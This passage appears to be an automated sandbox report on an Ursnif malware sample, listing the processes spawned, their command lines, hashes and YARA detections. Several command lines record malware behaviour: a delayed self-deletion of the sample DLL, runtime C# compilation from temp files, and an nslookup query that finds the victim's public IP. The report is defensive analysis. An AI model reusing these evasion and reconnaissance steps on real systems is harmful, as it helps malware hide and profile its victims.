                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Target ID:24
                      Start time:16:28:17
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Imagebase:0x7ff71b4c0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      Target ID:25
                      Start time:16:28:18
                      Start date:04/05/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff62ce00000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                      Target ID:26
                      Start time:16:28:19
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Imagebase:0x7ff66f440000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:29
                      Start time:16:28:30
                      Start date:04/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f3b00000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:33
                      Start time:16:28:47
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Imagebase:0x7ff7bb450000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:34
                      Start time:16:28:48
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:36
                      Start time:16:28:48
                      Start date:04/05/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff726940000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:37
                      Start time:16:28:56
                      Start date:04/05/2022
                      Path:C:\Windows\System32\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                      Imagebase:0x7ff6b45b0000
                      File size:99272 bytes
                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:39
                      Start time:16:29:47
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):
                      Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                      Imagebase:
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      No disassembly